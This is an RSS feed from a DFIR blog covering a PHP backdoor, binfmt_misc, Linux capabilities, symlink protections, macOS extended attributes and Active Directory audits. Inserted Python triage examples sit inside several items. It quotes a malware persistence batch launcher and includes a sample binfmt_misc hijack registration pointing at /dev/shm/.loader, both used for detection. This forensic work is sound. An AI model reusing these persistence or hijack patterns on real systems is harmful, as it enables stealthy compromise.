<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>dfir.ch</title>
    <link>https://dfir.ch/</link>
    <description>Recent content on dfir.ch</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Sun, 16 Nov 2025 16:04:20 +0200</lastBuildDate><atom:link href="https://dfir.ch/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Dissection of a PHP Backdoor leveraging php-win.exe</title>
      <link>https://dfir.ch/posts/dissection_php_backdoor/</link>
      <pubDate>Sun, 16 Nov 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/dissection_php_backdoor/</guid>
      
      <description>Introduction During a recent Incident Response engagement, my colleague Asger Deleuran Strunk identified an unusual Scheduled Task while reviewing AutoRuns data from all servers and workstations across the network. The task, named ClockLauncher, referenced a batch file located at:
C:\Windows\Temp\{0b1281f3-c9bc-4b85-ad92-0803ed04208f}\php_2\run-clock.bat
Here is the content of the file run-clock.bat:
@echo off
cd /d &quot;C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\&quot;
&quot;C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\php-win.exe&quot; &quot;C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\5.php&quot;
exit
The executable php-win.exe runs 5.php from a non-standard directory, C:\Windows\Temp\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\php_2\. The whole chain, from the task name and the file names down to the GUID-named directory, looks highly suspicious.</description>
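As an added example (not code from the post), a small Python triage routine that applies the reasoning above to Autoruns-style scheduled-task rows: it follows a .bat launcher into the binaries the script actually invokes, then flags images under user-writable roots, GUID-named directories and PHP interpreters outside their expected install path. The task rows, the batch content and the list of expected PHP install roots are constructed assumptions for this example, not data from the case.

```python
import re

# Roots a non-admin user (or a dropper) can write to; a scheduled-task image here is a red flag.
WRITABLE_ROOTS = ("c:\\windows\\temp\\", "c:\\users\\", "c:\\programdata\\", "c:\\perflogs\\")
# Where a legitimately installed PHP runtime would be expected. Assumption for this example;
# replace with what the asset inventory / golden image says before relying on it.
EXPECTED_PHP_ROOTS = ("c:\\php\\", "c:\\program files\\php\\", "c:\\xampp\\php\\")
PHP_BINARIES = ("php-win.exe", "php.exe", "php-cgi.exe")

# Directory component that is a bare GUID, e.g. \{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\
GUID_DIR = re.compile(r"\\\{[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\}\\", re.I)
# Quoted or bare absolute Windows path ending in an executable or script extension.
EXE_PATH = re.compile(r'"?([a-z]:\\[^"\r\n]+?\.(?:exe|bat|cmd|php))"?', re.I)


def executables_in_batch(text):
    """Every absolute path with an executable/script extension referenced in a batch file."""
    return [m.group(1) for m in EXE_PATH.finditer(text)]


def triage_image(path):
    """Reasons why one image path looks suspicious; an empty list means nothing stood out."""
    p = path.lower()
    reasons = []
    if p.startswith(WRITABLE_ROOTS):
        reasons.append("image under a user-writable root")
    if GUID_DIR.search(p):
        reasons.append("GUID-named directory in the path")
    base = p.rsplit("\\", 1)[-1]
    if base in PHP_BINARIES:
        if not p.startswith(EXPECTED_PHP_ROOTS):
            reasons.append("PHP interpreter outside the expected install roots")
        if base == "php-win.exe":
            reasons.append("php-win.exe is the console-less PHP build (no window when run by a task)")
    return reasons


def triage_task(name, image, batch_files):
    """Triage one scheduled task. batch_files maps lower-cased .bat/.cmd paths to their content,
    so a task that points at a launcher script is judged by what the script actually executes.
    Returns {image_path: [reasons]} for every image that raised at least one reason."""
    candidates = [image]
    if image.lower().endswith((".bat", ".cmd")):
        candidates.extend(executables_in_batch(batch_files.get(image.lower(), "")))
    findings = {}
    for candidate in candidates:
        reasons = triage_image(candidate)
        if reasons:
            findings[candidate] = reasons
    return findings


# Constructed sample data (not from the original case): the launcher path and batch body follow
# the structure described in the post; the Edge updater task is a benign control.
LAUNCHER = "C:\\Windows\\Temp\\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\\php_2\\run-clock.bat"
BATCH_FILES = {
    LAUNCHER.lower(): (
        "@echo off\r\n"
        'cd /d "C:\\Windows\\Temp\\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\\php_2\\"\r\n'
        '"C:\\Windows\\Temp\\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\\php_2\\php-win.exe" '
        '"C:\\Windows\\Temp\\{0B1281F3-C9BC-4B85-AD92-0803ED04208F}\\php_2\\5.php"\r\n'
        "exit\r\n"
    ),
}
TASKS = [
    ("ClockLauncher", LAUNCHER),
    ("MicrosoftEdgeUpdateTaskMachineUA",
     "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe"),
]

if __name__ == "__main__":
    for task_name, image in TASKS:
        for path, reasons in triage_task(task_name, image, BATCH_FILES).items():
            print(task_name, "->", path)
            for reason in reasons:
                print("   ", reason)
```

Feed it the Autoruns CSV export (task name and image path columns) plus the content of every .bat/.cmd the tasks reference; a task whose launcher pulls in a PHP interpreter from a GUID directory under C:\Windows\Temp will surface with all four reasons at once.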
      
    </item>
    
    <item>
      <title>BSides Berlin: Inside Mythic: Dissecting a Modern Attack Framework </title>
      <link>https://dfir.ch/talks/bsides_berlin_2025/</link>
      <pubDate>Sat, 08 Nov 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/bsides_berlin_2025/</guid>
      
      <description>Abstract Your mission, if you choose to accept it: take on the role of a detection engineer to dissect the most popular attack framework for attacks against macOS, Mythic. Mythic has various agents that can be easily integrated into the framework. In this talk, we will show common features of the agents, including how C2 communication works, how persistence can be set up, and how additional code can be executed. Our goal is to develop robust strategies for detecting these agents and to identify additional traces on the system that are left behind when these agents run on an infected computer.</description>
      
    </item>
    
    <item>
      <title>BSides Chisinau: Congratulations, You&#39;re Still Insecure!</title>
      <link>https://dfir.ch/talks/bsides_chisinau_2025/</link>
      <pubDate>Fri, 31 Oct 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/bsides_chisinau_2025/</guid>
      
      <description>Abstract For two decades, the security industry has promised progress: firewalls, antivirus, EDR, XDR, Zero Trust. Budgets have soared, tools have multiplied. And yet attackers still win with the same tricks. Why? Because while we buy shiny solutions, we continue to neglect the basics.
This keynote cuts through the illusion of progress and shows why culture and discipline, not the next silver-bullet product, are the real missing pieces.</description>
      
    </item>
    
    <item>
      <title>Today I learned: binfmt_misc</title>
      <link>https://dfir.ch/posts/today_i_learned_binfmt_misc/</link>
      <pubDate>Thu, 30 Oct 2025 04:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_binfmt_misc/</guid>
      
      <description>Introduction binfmt_misc (short for Binary Format Miscellaneous) is a Linux kernel feature that allows the system to recognize and execute files based on custom binary formats. It’s part of the Binary Format (binfmt) subsystem, which determines how the kernel runs an executable file.
Normally, Linux only knows how to run native binaries (like ELF files compiled for the system’s CPU architecture, and a few other file types). binfmt_misc extends this by allowing other kinds of files, scripts, binaries for other architectures, or even custom file types, to be executed as if they were native.</description>
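Added example (not from the post): a Python parser for the two formats binfmt_misc exposes, the :name:type:offset:magic:mask:interpreter:flags string written to /proc/sys/fs/binfmt_misc/register and the per-handler file under /proc/sys/fs/binfmt_misc/, plus a check that tells a QEMU user-mode handler apart from a handler whose magic and mask would also capture the host's own ELF binaries. The sample entries, the list of user-writable interpreter paths and the x86_64 host header are constructed assumptions.

```python
import operator
import os
import re

# Interpreter locations a legitimate handler (qemu-user, wine, mono, java) does not normally use.
SUSPECT_INTERP_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/", "/root/")
# First 20 bytes of an x86_64 ELF executable: e_ident, e_type=ET_EXEC, e_machine=EM_X86_64.
# The host architecture is an assumption of this example.
HOST_ELF_HEADER = bytes.fromhex("7f454c4602010100") + bytes(8) + bytes.fromhex("02003e00")


def _unescape(field):
    """Turn the \\xHH escapes accepted by the register interface into raw bytes."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), field).encode("latin-1")


def parse_register_string(line):
    """Parse ':name:type:offset:magic:mask:interpreter:flags'; the first char is the delimiter."""
    line = line.rstrip("\n")
    parts = line.split(line[0])          # parts[0] is the empty string before the first delimiter
    if len(parts) == 7:                  # flags field left out entirely
        parts.append("")
    if len(parts) != 8:
        raise ValueError("expected 7 delimited fields, got %d" % (len(parts) - 1))
    _, name, kind, offset, magic, mask, interpreter, flags = parts
    entry = {"name": name, "type": kind, "interpreter": interpreter, "flags": flags}
    if kind == "M":
        entry["offset"] = int(offset) if offset else 0
        entry["magic"] = _unescape(magic)
        entry["mask"] = _unescape(mask) if mask else None
    elif kind == "E":
        entry["extension"] = magic       # for type E the magic field carries the extension
    else:
        raise ValueError("unknown handler type %r" % kind)
    return entry


def parse_proc_entry(text):
    """Parse /proc/sys/fs/binfmt_misc/NAME as the kernel prints it."""
    entry = {"enabled": False, "flags": ""}
    for line in text.splitlines():
        key, _, value = line.partition(" ")
        if line in ("enabled", "disabled"):
            entry["enabled"] = line == "enabled"
        elif key == "interpreter":
            entry["interpreter"] = value
        elif key == "flags:":
            entry["flags"] = value
        elif key == "offset":
            entry["offset"] = int(value)
        elif key in ("magic", "mask"):
            entry[key] = bytes.fromhex(value)
        elif key == "extension":
            entry["extension"] = value.lstrip(".")
    return entry


def rule_matches(entry, data):
    """Would this handler claim a file starting with 'data'? Mirrors the kernel comparison
    (data AND mask) == (magic AND mask) over len(magic) bytes at the configured offset."""
    magic = entry.get("magic")
    if magic is None:
        return False
    offset = entry.get("offset", 0)
    mask = entry.get("mask") or bytes([0xFF]) * len(magic)
    window = data[offset:offset + len(magic)]
    return len(window) == len(magic) and all(
        operator.and_(w, m) == operator.and_(g, m) for w, g, m in zip(window, magic, mask))


def assess(entry):
    """Reasons a handler deserves a closer look; an empty list for an ordinary-looking one."""
    reasons = []
    interp = entry.get("interpreter", "")
    untrusted = interp.startswith(SUSPECT_INTERP_PREFIXES)
    if untrusted:
        reasons.append("interpreter in a user-writable path: " + interp)
    if rule_matches(entry, HOST_ELF_HEADER):
        reasons.append("magic/mask also match native host ELF files; binfmt_misc handlers are "
                       "tried before the built-in ELF loader, so those execs go to the interpreter")
    if untrusted and "C" in entry.get("flags", ""):
        reasons.append("C flag: the interpreter runs with the credentials of the target file, "
                       "so a setuid-root target hands root to the interpreter")
    return reasons


def scan_live(root="/proc/sys/fs/binfmt_misc"):
    """Assess every handler registered on this host; {} when binfmt_misc is not mounted."""
    results = {}
    if os.path.isdir(root):
        for name in os.listdir(root):
            if name not in ("register", "status"):
                with open(os.path.join(root, name)) as f:
                    results[name] = assess(parse_proc_entry(f.read()))
    return results


# Constructed samples: a normal qemu-user entry as the kernel would print it, and a hypothetical
# registration string for a handler that captures every native ELF with a writable interpreter.
QEMU_ENTRY = (
    "enabled\n"
    "interpreter /usr/bin/qemu-aarch64-static\n"
    "flags: OCF\n"
    "offset 0\n"
    "magic 7f454c460201010000000000000000000200b700\n"
    "mask ffffffffffffff00fffffffffffffffffeffffff\n"
)
HIJACK_REGISTER = r":svc-helper:M::\x7fELF::/dev/shm/.loader:C"
```

The QEMU entry carries the same ELF magic but its mask pins e_machine to AArch64, so it never matches a host binary; the hypothetical entry has no mask and a four-byte magic, so every ELF on the box would be started through /dev/shm/.loader. scan_live() runs the same assessment over whatever is registered on the host.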
      
    </item>
    
    <item>
      <title>Hack.lu: Anti-Forensics - You are doing it wrong</title>
      <link>https://dfir.ch/talks/hack.lu_2025/</link>
      <pubDate>Tue, 21 Oct 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/hack.lu_2025/</guid>
      
      <description>Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood. From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent. Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response.</description>
      
    </item>
    
    <item>
      <title>Troopers: Anti-Forensics - You are doing it wrong</title>
      <link>https://dfir.ch/talks/troopers_2025/</link>
      <pubDate>Wed, 25 Jun 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/troopers_2025/</guid>
      
      <description>Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood.
From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent.
Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response.</description>
      
    </item>
    
    <item>
      <title>FIRST Conference: Anti-Forensics - You are doing it wrong</title>
      <link>https://dfir.ch/talks/firstcon_2025/</link>
      <pubDate>Tue, 24 Jun 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/firstcon_2025/</guid>
      
      <description>Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood.
From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent.
Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response.</description>
      
    </item>
    
    <item>
      <title>Euskalhack: In-Depth Study Of Linux Rootkits</title>
      <link>https://dfir.ch/talks/euskalhack_2025/</link>
      <pubDate>Fri, 20 Jun 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/euskalhack_2025/</guid>
      
      <description>Abstract This talk, “In-Depth Study of Linux Rootkits,” will provide a comprehensive examination of the evolution of Linux rootkits, from their inception to the sophisticated variants seen today. Participants will gain insights into advanced rootkit techniques, effective detection strategies, and the future landscape for defenders. By exploring the historical context, current methodologies, and emerging threats, attendees will be equipped with the knowledge and tools necessary to safeguard Linux systems against rootkit attacks.</description>
      
    </item>
    
    <item>
      <title>x33fcon: From Zero to a Moderately Skilled MacOS Forensic Analyst</title>
      <link>https://dfir.ch/talks/x33fcon_2025/</link>
      <pubDate>Thu, 12 Jun 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/x33fcon_2025/</guid>
      
      <description>Abstract Learn the essentials of macOS forensic analysis, from foundational concepts to advanced techniques, in this comprehensive journey into the world of macOS security.
Figure 1: From Zero to a Moderately Skilled MacOS Forensic Analyst (YouTube video)</description>
      
    </item>
    
    <item>
      <title>SecurityFest: Anti-Forensics - You are doing it wrong</title>
      <link>https://dfir.ch/talks/securityfest_2025/</link>
      <pubDate>Thu, 05 Jun 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/securityfest_2025/</guid>
      
      <description>Abstract In this talk, we’ll dissect common anti-forensics strategies—like USN Journal deletion, shellbag clearing, timestamp manipulation, and disabling access time updates—and reveal how they are often executed ineffectively or misunderstood.
From registry edits like masking user account activity to configuring Windows EFS, we’ll examine why these techniques often fail against modern investigative workflows and how defenders use these “footprints of erasure” to uncover malicious intent.
Attendees will gain a comprehensive understanding of what works and what doesn’t and how to identify these techniques during incident response.</description>
      
    </item>
    
    <item>
      <title>Linux Capabilities Revisited</title>
      <link>https://dfir.ch/posts/linux_capabilities/</link>
      <pubDate>Fri, 16 May 2025 03:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/linux_capabilities/</guid>
      
      <description>Introduction Notes to kernel developers: The goal of capabilities is to divide the power of superuser into pieces, such that if a program that has one or more capabilities is compromised, its power to do damage to the system would be less than the same program running with root privilege. Capabilities(7) — Linux manual page
Capabilities are a fine-grained access control mechanism in Linux, allowing more granular permissions than the traditional superuser (root) model.</description>
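Added example, not from the post: the capability sets of a process are exposed as hex bitmasks in the CapInh/CapPrm/CapEff/CapBnd/CapAmb lines of /proc/PID/status, and a responder wants them as names. The Python below decodes the masks using the bit order from include/uapi/linux/capability.h, parses the status file, and flags non-root processes whose effective set contains capabilities that are root-equivalent on their own. The two status excerpts and the root-equivalent list are constructed assumptions for the example.

```python
import os

# Capability names in bit order as defined in include/uapi/linux/capability.h (bits 0..40).
CAP_NAMES = (
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
)

# Capabilities that are root-equivalent on their own or give a short path to root.
# Assumption: a triage list for this example, not an exhaustive classification.
ROOT_EQUIVALENT = frozenset({
    "cap_sys_admin", "cap_sys_module", "cap_sys_ptrace", "cap_sys_rawio",
    "cap_dac_override", "cap_dac_read_search", "cap_setuid", "cap_setgid",
    "cap_setfcap", "cap_chown", "cap_fowner", "cap_bpf",
})
CAP_SETS = ("CapInh", "CapPrm", "CapEff", "CapBnd", "CapAmb")


def decode_caps(hex_mask):
    """Expand a capability bitmask as printed in /proc/PID/status (e.g. '000001ffffffffff')."""
    value = int(hex_mask, 16)
    names = [name for bit, name in enumerate(CAP_NAMES) if (value >> bit) % 2 == 1]
    unknown = value >> len(CAP_NAMES)          # bits newer than this table
    if unknown:
        names.append("unknown bits above %d: 0x%x" % (len(CAP_NAMES) - 1, unknown))
    return names


def parse_status(text):
    """Pull Name, real Uid and the five capability sets out of a /proc/PID/status dump."""
    info = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        value = value.strip()
        if key == "Name":
            info["name"] = value
        elif key == "Uid":
            info["uid"] = int(value.split()[0])
        elif key in CAP_SETS:
            info[key] = decode_caps(value)
    return info


def triage_process(info):
    """Root-equivalent capabilities in the effective set of a non-root process (sorted)."""
    if info.get("uid") == 0:
        return []                              # root already has them all; nothing to flag
    return sorted(ROOT_EQUIVALENT.intersection(info.get("CapEff", [])))


def scan_live_system(proc="/proc"):
    """Run the triage over every process on this host; {pid: [caps]} for hits only."""
    hits = {}
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc, pid, "status")) as f:
                info = parse_status(f.read())
        except OSError:
            continue                           # process vanished or is not readable
        risky = triage_process(info)
        if risky:
            hits[int(pid)] = risky
    return hits


# Constructed /proc/PID/status excerpts (not real processes): a web server that only kept
# cap_net_bind_service, and a user-owned process sitting on cap_sys_ptrace + cap_sys_admin.
WEBSERVER_STATUS = ("Name:\tnginx\nUid:\t33\t33\t33\t33\nCapInh:\t0000000000000000\n"
                    "CapPrm:\t0000000000000400\nCapEff:\t0000000000000400\n"
                    "CapBnd:\t000001ffffffffff\nCapAmb:\t0000000000000000\n")
IMPLANT_STATUS = ("Name:\tkworker\nUid:\t1000\t1000\t1000\t1000\nCapInh:\t0000000000000000\n"
                  "CapPrm:\t0000000000280000\nCapEff:\t0000000000280000\n"
                  "CapBnd:\t000001ffffffffff\nCapAmb:\t0000000000000000\n")
```

The same decoder applies to file capabilities (getcap output) and to the Ambient set, which is how a capability survives execve into an unprivileged child; a non-root process carrying cap_sys_ptrace or cap_sys_admin in CapEff is worth the same attention as a setuid binary.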
      
    </item>
    
    <item>
      <title>BSides Transylvania: From Zero to a Moderately Skilled MacOS Forensic Analyst</title>
      <link>https://dfir.ch/talks/bsides_transylvania_2025/</link>
      <pubDate>Sat, 10 May 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/bsides_transylvania_2025/</guid>
      
      <description>Abstract Learn the essentials of macOS forensic analysis, from foundational concepts to advanced techniques, in this comprehensive journey into the world of macOS security.
Figure 1: BSides Transylvania: From Zero to a Moderately Skilled MacOS Forensic Analyst
YouTube video: not recorded.</description>
      
    </item>
    
    <item>
      <title>FIRST Technical Colloquium Amsterdam: In-Depth Study of Linux Rootkits</title>
      <link>https://dfir.ch/talks/first_amsterdam_2025/</link>
      <pubDate>Thu, 27 Mar 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/first_amsterdam_2025/</guid>
      
      <description>Abstract This talk, “In-Depth Study of Linux Rootkits,” will provide a comprehensive examination of the evolution of Linux rootkits, from their inception to the sophisticated variants seen today. Participants will gain insights into advanced rootkit techniques, effective detection strategies, and the future landscape for defenders. By exploring the historical context, current methodologies, and emerging threats, attendees will be equipped with the knowledge and tools necessary to safeguard Linux systems against rootkit attacks.</description>
      
    </item>
    
    <item>
      <title>BSides Kent: The Gist of Hundreds of Incident Response Cases</title>
      <link>https://dfir.ch/talks/bsides_kent_2025/</link>
      <pubDate>Sat, 22 Mar 2025 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/bsides_kent_2025/</guid>
      
      <description>Abstract How to become an Incident Response Rockstar? After conducting hundreds of Incident Response cases, more data is not always better. Focusing on the most relevant forensic data can speed up the investigation process rapidly. In this talk, we will discuss the importance of various event logs to track down lateral movement paths from the attackers, how to find planted (and seemingly legitimate) backdoors, and how you can work smarter, not harder - which also holds true in digital forensics.</description>
      
    </item>
    
    <item>
      <title>Today I Learned - Protected Symlinks</title>
      <link>https://dfir.ch/posts/today_i_learned_protected_symlinks/</link>
      <pubDate>Mon, 24 Feb 2025 04:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_protected_symlinks/</guid>
      
      <description>Introduction A long-standing class of security issues is the symlink-based time-of-check-time-of-use race, most commonly seen in world-writable directories like /tmp. The common method of exploitation of this flaw is to cross privilege boundaries when following a given symlink (i.e. a root process follows a symlink belonging to another user). For a likely incomplete list of hundreds of examples across the years, please see: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=/tmp. Source: Sysctl Explorer
The protected_symlinks setting within the Linux Kernel helps prevent TOCTOU (time-of-check-time-of-use) vulnerabilities in privileged processes.</description>
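Added example (not part of the post): the kernel documentation states the rule behind fs.protected_symlinks as "symlinks are permitted to be followed only when outside a sticky world-writable directory, or when the uid of the symlink and follower match, or when the directory owner matches the symlink's owner". The Python below models that rule as a pure function over the metadata the kernel looks at, reads the live sysctl, and shows the userland half of the defence that a privileged writer still needs in /tmp: O_CREAT|O_EXCL (with O_NOFOLLOW) so a pre-planted symlink makes the open fail instead of redirecting it. The uids and modes in the checks are constructed values.

```python
import operator
import os
import stat
import tempfile


def _has(mode, bit):
    return operator.and_(mode, bit) != 0


def may_follow_symlink(dir_mode, dir_uid, link_uid, follower_uid, protected_symlinks=1):
    """Model of fs.protected_symlinks (Documentation/admin-guide/sysctl/fs.rst): with the
    sysctl set to 1 a symlink is followed only when it is outside a sticky world-writable
    directory, or its owner is the follower, or the directory owner is the symlink owner.
    Anything else fails with EACCES."""
    if protected_symlinks == 0:
        return True
    sticky_world_writable = _has(dir_mode, stat.S_ISVTX) and _has(dir_mode, stat.S_IWOTH)
    if not sticky_world_writable:
        return True
    return link_uid == follower_uid or dir_uid == link_uid


def live_setting(path="/proc/sys/fs/protected_symlinks"):
    """Current value on this host, or None where the file is absent (non-Linux, old kernel)."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def create_exclusive(path, mode=0o600):
    """Userland side of the same problem: a privileged program dropping a file into a shared
    directory must refuse to reuse an existing name, symlink included. O_CREAT|O_EXCL makes
    the kernel reject any pre-existing entry (a dangling attacker symlink too); O_NOFOLLOW is
    belt-and-braces for the open itself. Returns the fd, raises FileExistsError otherwise."""
    return os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, mode)


def demo_exclusive_create():
    """Replay the classic /tmp race against create_exclusive(): the attacker plants a dangling
    symlink first; the privileged writer must notice. Returns (plain_ok, symlink_rejected)."""
    workdir = tempfile.mkdtemp()
    plain = os.path.join(workdir, "report.txt")
    os.close(create_exclusive(plain))
    planted = os.path.join(workdir, "victim.txt")
    os.symlink(os.path.join(workdir, "does-not-exist"), planted)   # dangling, attacker-controlled
    try:
        os.close(create_exclusive(planted))
        rejected = False
    except FileExistsError:
        rejected = True
    return os.path.exists(plain), rejected
```

The model makes the limits of the sysctl visible: it only bites in sticky world-writable directories (/tmp, /var/tmp, /dev/shm), so a root daemon that blindly opens files under a directory it merely mis-permissioned gets no protection from it, which is why create_exclusive() is still needed in the program.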
      
    </item>
    
    <item>
      <title>macOS Extended Attributes: Case Study</title>
      <link>https://dfir.ch/posts/macos_extended_attributes/</link>
      <pubDate>Sat, 15 Feb 2025 12:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/macos_extended_attributes/</guid>
      
      <description>Introduction Extended attributes (EAs) are a powerful and sometimes overlooked feature of macOS’s file system, storing additional metadata about files beyond what standard attributes like file name, size, and permissions allow. While these attributes are invisible in typical file interactions, they play a critical role in various macOS features and workflows.
Inspecting Extended Attributes macOS provides several tools for working with extended attributes. These include:
The ls command (the @ at the end of the permissions indicates extended attributes): -rw-r--r--@ 1 malmoeb staff 202767345 Jan 6 13:29 Webex.</description>
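Added example, not from the post: the attribute a forensic analyst meets most often is com.apple.quarantine, whose value is a semicolon-separated string of flags, a hexadecimal download timestamp, the tagging application and a UUID. The Python below lists attribute names where the interpreter supports it, decodes a quarantine value, and walks a directory for files still carrying the tag. The sample value is constructed; the four-field layout is stated as an assumption, and the flag bits are not interpreted.

```python
import datetime
import os


def list_xattrs(path):
    """Extended-attribute names on path. Python's os.listxattr exists on Linux only; on macOS
    use `ls -l@`, `xattr -l PATH` or the third-party xattr package. None when unsupported."""
    listxattr = getattr(os, "listxattr", None)
    if listxattr is None:
        return None
    try:
        return sorted(listxattr(path))
    except OSError:
        return []


def parse_quarantine(value):
    """Decode a com.apple.quarantine value laid out as 'flags;hex-unix-time;agent;uuid'.
    The layout is an assumption of this example; the individual flag bits are left undecoded.
    The timestamp is when the downloading application tagged the file."""
    fields = value.split(";")
    if len(fields) not in (3, 4):
        raise ValueError("unexpected quarantine layout: %r" % value)
    epoch = int(fields[1], 16)
    return {
        "flags": int(fields[0], 16),
        "epoch": epoch,
        "downloaded_at": datetime.datetime.fromtimestamp(epoch, datetime.timezone.utc),
        "agent": fields[2],
        "uuid": fields[3] if len(fields) == 4 else "",
    }


def quarantine_report(directory):
    """Every file under directory that still carries com.apple.quarantine, with the decoded
    value. Empty on platforms without os.getxattr (drive the xattr CLI on macOS instead)."""
    getxattr = getattr(os, "getxattr", None)
    report = []
    if getxattr is None:
        return report
    for root, _, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                raw = getxattr(path, "com.apple.quarantine")
            except OSError:
                continue                       # no such attribute, or not readable
            report.append((path, parse_quarantine(raw.decode("utf-8", "replace"))))
    return report


# Constructed value in the shape of a browser-applied quarantine attribute (not from a real host).
SAMPLE_QUARANTINE = "0083;5f9b1a2c;Safari;1D2C3B4A-5E6F-4A7B-8C9D-0E1F2A3B4C5D"
```

The decoded timestamp is independent of the file system timestamps, so it survives a `touch`, and the agent field names the application that wrote the tag; both are worth comparing against the browser history and the unified log when reconstructing how a file arrived.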
      
    </item>
    
    <item>
      <title>Tear Down The Castle - Part 2</title>
      <link>https://dfir.ch/posts/tear_down_castle_part_two/</link>
      <pubDate>Thu, 30 Jan 2025 11:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/tear_down_castle_part_two/</guid>
      
      <description>This is the second part of a two-part series about Active Directory security. Read the first part here.
To gain insight into common issues and patterns of misconfiguration, we analyzed 250 PingCastle reports collected from Incident Response cases and Compromise Assessments. We indicate how many of the 250 domains checked were affected by the finding (Affected Domains: N/250).
PingCastle is a popular tool for auditing the security of Active Directory environments, pinpointing vulnerabilities, and offering actionable recommendations for improvement.</description>
      
    </item>
    
    <item>
      <title>Oh my .. ! - Suspicious network traffic detected including Ransomware</title>
      <link>https://dfir.ch/posts/suspicious_network_traffic_ransomware/</link>
      <pubDate>Wed, 22 Jan 2025 12:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/suspicious_network_traffic_ransomware/</guid>
      
      <description>Introduction A customer contacted us due to a high-severity ransomware alert in Windows Defender for Endpoint (Figure 1).
Figure 1: Suspicious network traffic detected including Ransomware Clicking on one of the alerts does not reveal additional details besides the IP address (Figure 2).
Figure 2: Process Tree After further clicks, we end up at the explanation in Figure 3, which doesn’t inspire confidence. What exactly is happening here, and which process on the host is responsible for these network connections?</description>
      
    </item>
    
    <item>
      <title>Tear Down The Castle - Part 1</title>
      <link>https://dfir.ch/posts/tear_down_castle_part_one/</link>
      <pubDate>Sun, 19 Jan 2025 04:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/tear_down_castle_part_one/</guid>
      
      <description>Introduction In the realm of IT infrastructure, Active Directory (AD) serves as a crucial backbone, enabling organizations to manage users, devices, and resources efficiently. However, given its central role, it also presents a significant security target, and maintaining its integrity is paramount. Misconfigurations and overlooked security gaps in AD can expose an organization to critical vulnerabilities, leading to potential breaches, data theft, and system downtime.
